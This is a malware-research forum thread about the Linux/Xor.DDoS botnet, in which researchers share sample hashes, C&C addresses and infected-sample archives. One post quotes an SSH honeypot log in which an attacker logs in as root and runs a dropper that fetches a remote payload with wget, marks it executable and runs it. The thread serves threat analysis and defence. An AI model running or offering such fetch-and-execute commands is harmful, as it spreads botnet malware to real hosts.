Linux/Xor.DDoS - Page 3 - KernelMode.info

Re: Linux/Xor.DDoS

#26385 by tWiCe
Mon Jul 27, 2015 9:36 am

zrav wrote: Details can be found here:
http://security.radware.com/uploadedFil ... Report.pdf

/zrav

It's confusing that they say:

This report presents an analysis of the attack, the sophisticated attack tool and an inside look into a Tsunami DDoS attack

because this bot has nothing with Tsunami family..

Username

tWiCe

Posts

49

Joined

Sat Jul 18, 2015 8:56 am

Re: Linux/Xor.DDoS

#26433 by unixfreaxjp
Tue Aug 04, 2015 1:49 pm

tWiCe wrote: It's confusing that they say:
This report presents an analysis of the attack, the sophisticated attack tool and an inside look into a Tsunami DDoS attack
because this bot has nothing with Tsunami family..

Agreed and let's focus on positive confirmed xor.ddos in hand. If they're back will be in big bulk of network. We can't expect enforcement in PRC to do something of these soon.

Username

unixfreaxjp

Posts

501

Joined

Thu Apr 12, 2012 4:53 pm

Re: Linux/Xor.DDoS

#26480 by unixfreaxjp
Sun Aug 09, 2015 4:26 pm

attack via ssh:

Code: Select all

2015-08-09 19:05:39+0900 New connection: 43.229.53.88:47431 [session: 782]
2015-08-09 19:05:45+0900 [session=782,ip=43.229.53.88] Remote SSH version: SSH-2.0-PUTTY
2015-08-09 19:05:45+0900 [session=782,ip=43.229.53.88] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa
2015-08-09 19:05:45+0900 [session=782,ip=43.229.53.88] outgoing: aes128-ctr hmac-sha1 none
2015-08-09 19:05:45+0900 [session=782,ip=43.229.53.88] incoming: aes128-ctr hmac-sha1 none

2015-08-09 19:05:45+0900 New connection: 43.229.53.88:47432 [session: 783]
2015-08-09 19:05:45+0900 [session=782,ip=43.229.53.88] Got remote error, code 11
2015-08-09 19:05:45+0900 [session=782,ip=43.229.53.88] connection lost
2015-08-09 19:05:46+0900 [session=783,ip=43.229.53.88] Remote SSH version: SSH-2.0-PUTTY
2015-08-09 19:05:46+0900 [session=783,ip=43.229.53.88] kex alg, key alg: diffie-hellman-group1-sha1 ssh-rsa
2015-08-09 19:05:46+0900 [session=783,ip=43.229.53.88] outgoing: aes128-ctr hmac-sha1 none
2015-08-09 19:05:46+0900 [session=783,ip=43.229.53.88] incoming: aes128-ctr hmac-sha1 none
2015-08-09 19:05:47+0900 [session=783,ip=43.229.53.88] NEW KEYS
2015-08-09 19:05:47+0900 [session=783,ip=43.229.53.88] starting service ssh-userauth
2015-08-09 19:05:48+0900 [session=783,ip=43.229.53.88] root trying auth none
2015-08-09 19:05:48+0900 [session=783,ip=43.229.53.88] root trying auth password
2015-08-09 19:05:48+0900 [session=783,ip=43.229.53.88] login attempt [root/123456] succeeded
2015-08-09 19:05:48+0900 [session=783,ip=43.229.53.88] root authenticated with password
2015-08-09 19:05:48+0900 [session=783,ip=43.229.53.88] starting service ssh-connection
2015-08-09 19:05:48+0900 [session=783,ip=43.229.53.88] got channel session request
2015-08-09 19:05:48+0900 [session=783,ip=43.229.53.88] channel open
2015-08-09 19:05:49+0900 [session=783,ip=43.229.53.88] executing command "#!/bin/sh
2015-08-09 19:05:49+0900 [session=783,ip=43.229.53.88] exec command: "#!/bin/sh
2015-08-09 19:05:49+0900 [session=783,ip=43.229.53.88] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-08-09 19:05:49+0900 [session=783,ip=43.229.53.88] wget h00p://192.126.112.88/abf/h12
2015-08-09 19:05:49+0900 [session=783,ip=43.229.53.88] chmod +x h12
2015-08-09 19:05:49+0900 [session=783,ip=43.229.53.88] ./h12
2015-08-09 19:05:49+0900 [session=783,ip=43.229.53.88] "
2015-08-09 19:05:49+0900 [session=783,ip=43.229.53.88] Opening TTY log: log/tty/20150809-190549-1667.log
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] Running exec command "#!/bin/sh
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] wget h00p://192.126.112.88/abf/h12
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] chmod +x h12
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] ./h12
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] "
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] CMD: #!/bin/sh
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] wget h00p://192.126.112.88/abf/h12
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] chmod +x h12
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] ./h12
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88]
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] Command not found: #!/bin/sh
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] wget h00p://192.126.112.88/abf/h12
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] chmod +x h12
2015-08-09 19:05:52+0900 [session=783,ip=43.229.53.88] ./h12
2015-08-09 19:10:54+0900 [session=783,ip=43.229.53.88] remote close
2015-08-09 19:10:54+0900 [session=783,ip=43.229.53.88] sending close 0
2015-08-09 19:10:54+0900 [session=783,ip=43.229.53.88] got channel session request
2015-08-09 19:10:54+0900 [session=783,ip=43.229.53.88] channel open
2015-08-09 19:10:55+0900 [session=783,ip=43.229.53.88] executing command "ls -la /var/run/gcc.pid"
2015-08-09 19:10:55+0900 [session=783,ip=43.229.53.88] exec command: "ls -la /var/run/gcc.pid"
2015-08-09 19:10:58+0900 [session=783,ip=43.229.53.88] Running exec command "ls -la /var/run/gcc.pid"
2015-08-09 19:10:58+0900 [session=783,ip=43.229.53.88] CMD: ls -la /var/run/gcc.pid
2015-08-09 19:10:58+0900 [session=783,ip=43.229.53.88] Command found: ls -la /var/run/gcc.pid
2015-08-09 19:10:58+0900 [session=783,ip=43.229.53.88] sending close 1
2015-08-09 19:10:58+0900 [session=783,ip=43.229.53.88] remote close
2015-08-09 19:10:58+0900 [session=783,ip=43.229.53.88] Got remote error, code 11
2015-08-09 19:10:58+0900 [session=783,ip=43.229.53.88] connection lost

Sample: https://www.virustotal.com/en/file/9688 ... /analysis/

attacker=43.229.53.88

Code: Select all

 {
  "ip": "43.229.53.88",
  "hostname": "No Hostname",
  "city": "Tsuen Wan",
  "country": "HK",
  "loc": "22.3667,114.1000",
  "org": "AS63857 HOT NET LIMITED"
  }

payload in 192.126.112.88 (h00p://192.126.112.88/abf/h12)

Code: Select all

 {
  "ip": "192.126.112.88",
  "hostname": "No Hostname",
  "city": "Rowland Heights",
  "region": "California",
  "country": "US",
  "loc": "33.9782,-117.9040",
  "org": "AS26484 HOSTSPACE NETWORKS LLC",
  "postal": "91748"
}

CNC1 in ns1.hostasa.org 148.163.29.12:3308

Code: Select all

  {
  "ip": "148.163.29.12",
  "hostname": "we.love.servers.at.ioflood.com",
  "city": "Phoenix",
  "region": "Arizona",
  "country": "US",
  "loc": "33.4319,-112.0150",
  "org": "AS53755 Input Output Flood LLC",
  "postal": "85034",
  "phone": "602"
   }

CNC2 in ns3.hostasa.org 192.126.126.64:3308

Code: Select all

   {
  "ip": "192.126.126.64",
  "hostname": "No Hostname",
  "city": "Los Angeles",
  "region": "California",
  "country": "US",
  "loc": "34.0530,-118.2642",
  "org": "AS26484 HOSTSPACE NETWORKS LLC",
  "postal": "90017"
   }

Attachments

h12.XOR.DDos.7z

7z/infected
(230.77 KiB) Downloaded 46 times

Username

unixfreaxjp

Posts

501

Joined

Thu Apr 12, 2012 4:53 pm

Re: Linux/Xor.DDoS

#26482 by zrav
Sun Aug 09, 2015 4:46 pm

unixfreaxjp wrote:
tWiCe wrote: It's confusing that they say:
This report presents an analysis of the attack, the sophisticated attack tool and an inside look into a Tsunami DDoS attack
because this bot has nothing with Tsunami family..
Agreed and let's focus on positive confirmed xor.ddos in hand. If they're back will be in big bulk of network. We can't expect enforcement in PRC to do something of these soon.

@unixfreaxjp @tWiCe
The analysis definitely covers a XOR.DDOS variant.

This is the sample referenced in the article:
https://www.virustotal.com/en/file/498f ... /analysis/

The term "Tsunami" is not part of the malware name, rather it is a name for a SYN Flood with large payload.

Thank you for the great work at KM and MMD :)

Username

zrav

Posts

2

Joined

Sun Apr 05, 2015 8:26 am

Re: Linux/Xor.DDoS

#26489 by unixfreaxjp
Mon Aug 10, 2015 9:47 am

zrav wrote:The term "Tsunami" is not part of the malware name, rather it is a name for a SYN Flood with large payload.

Dully noted, I shall review it thoroughly. Thank you for the kindly share.

Please help to raise awareness of ELF malware.

Username

unixfreaxjp

Posts

501

Joined

Thu Apr 12, 2012 4:53 pm

Re: Linux/Xor.DDoS

#26496 by tWiCe
Tue Aug 11, 2015 2:07 pm

Caught it couple of days ago.
https://www.virustotal.com/ru/file/a5af ... /analysis/

Attachments

a5afcc42f5eb61dc7992576195f8abb1c519d32d8c788b547d3b634277f16681.7z

infected
(230.71 KiB) Downloaded 48 times

Username

tWiCe

Posts

49

Joined

Sat Jul 18, 2015 8:56 am

Re: Linux/Xor.DDoS

#26634 by shibumi
Tue Sep 01, 2015 9:25 am

Caught in a HFS panel with different other stuff.
C&C: 114.114.114.114 (CN)
DNS: 8.8.8.8
https://www.virustotal.com/en/file/35c8 ... 441022496/

Attachments

35c8606b8ce36c0cd574b6127569b823ca8ab9f5954fc824bbff852c0dcfb0ad.7z

infected
(243.08 KiB) Downloaded 47 times

Username

shibumi

Posts

8

Joined

Tue Oct 14, 2014 1:48 pm

Location

Germany

Contact

Re: Linux/Xor.DDoS

#26732 by shibumi
Wed Sep 16, 2015 12:15 am

More Linux/Xor.DDoS from Host:

43.229.53.90

Code: Select all

inetnum:        43.229.52.0 - 43.229.55.255
netname:        HOTNETLIMITED-HK
descr:          HOT NET LIMITED
descr:          FLAT/RM A30, 9/F SILVERCORP
descr:          INT'L TOWER 707-713 NATHAN RD
descr:          MONGKOK KLN
country:        HK

Code: Select all

34c7ff43c4aeaab36d5904a8c18875c0  f1c
34c7ff43c4aeaab36d5904a8c18875c0  f1ca
bf2b4a61fc7c39659a2570ed27fa155d  g13d
2d7492e904cd98016e95696fb50891c7  h13a

I can't determine the C&C maybe somebody want to look over it.. I only find 2 DNS: 8.8.8.8 and 8.8.4.4

Attachments

43.229.53.90.7z

infected
(231.16 KiB) Downloaded 39 times

Username

shibumi

Posts

8

Joined

Tue Oct 14, 2014 1:48 pm

Location

Germany

Contact

Re: Linux/Xor.DDoS

#26736 by unixfreaxjp
Wed Sep 16, 2015 4:15 am

Xor.DDoS with CNC "hostasa" is backwith its campaign, w/downloads to leg.rar
Details is in here: http://bit.ly/1iuxQuY
Pics:

New CNC IP:

Code: Select all

192.126.126.64 
107.160.40.9
23.234.60.143

Samples:

Code: Select all

 142e14d7872cbd783246d3be0396f3eb3c9fbd2c30d571ff3bd7769e00c08fcd
 8d25feed690c1381f70018f5b905efbc9d8901098371cdeb8f32aa4d358210c7
 a5afcc42f5eb61dc7992576195f8abb1c519d32d8c788b547d3b634277f16681

Attachments

Xor.DDoS.7z

7z/infected
(231.05 KiB) Downloaded 54 times

Username

unixfreaxjp

Posts

501

Joined

Thu Apr 12, 2012 4:53 pm

Re: Linux/Xor.DDoS

#26804 by Blaze
Fri Sep 25, 2015 8:45 pm

Some more Xor.DDoS samples attached. Wrote an accompanying blog post about it as well (includes disinfection + prevention) if interested:
http://bartblaze.blogspot.com/2015/09/n ... rddos.html

Have to do samples in 2 seperate posts as quota reached for attachments otherwise.

In this batch:

Code: Select all

23d0e9fad5922a898e4e7121cf99f369d23e14e9	
0ddcddb83156461e8c6a7cb3ecd1d62854fc9dd2	
a1f2e1fdaa70374fdc4c1986bdfdcfa996e22965	
1850c780998654b4e88adda259f697f49591bb5b	
b74c3dee4f7b59365f9b16af28251dc98463ca65	
4090dbdd0059ba463071e532eac0fe1f02ad4b11	
f7788d69b57dda14971e779585d67d6cab26b8cd	
55ab21b2998f3575c8bddd623c179f840d202970	
36f29a7d484469184eb76aaadd8d275860de83f2	
6d3fccc6be069c3f20866e269241fa805d8d7473	
29f39183617d229e52160d396e254cf2daf4919c	
0f349e75c5e52d2488e01cd03f27ca69cbee3fbb	
50ecb8804501e7ee06dc6e253899f88fdbba6815	
5ee52a60b1b19a5486e1a0bf6ed943912c606687	
f7a0bcf5fc07aa8dca06c3b5ac4ce6285f61c792	
b34b6f0ec42a0153c043b0665ec47bf6e5aac894	
952d4582441f2ce3fb69c459dcf0cb0cd530dedb	
1fd268f71544887b2ac860db90fc6de3dd312733	
01eedc87363b221880b0cfe6b1789026b9ff0c59	
c79cab75129227d4e5cb64d8b4a74ae4f10e83af	
87189877c958b2922ff974215d2083f13cf43c76	
c23f1f464cce155c260962ce0e0e7342c116ee9b	
2c898453d7bbf24d0685f8e714a06c5762203e52	
ba964c19c289de7b4e28ff4e73e062026ff86225	
4ffb64f0d7bc9556f0401270556c0e81be8422cb

Attachments

xor.ddos.1.zip

(6.3 MiB) Downloaded 52 times

Username

Blaze

Posts

198

Joined

Fri Aug 27, 2010 7:35 am

Contact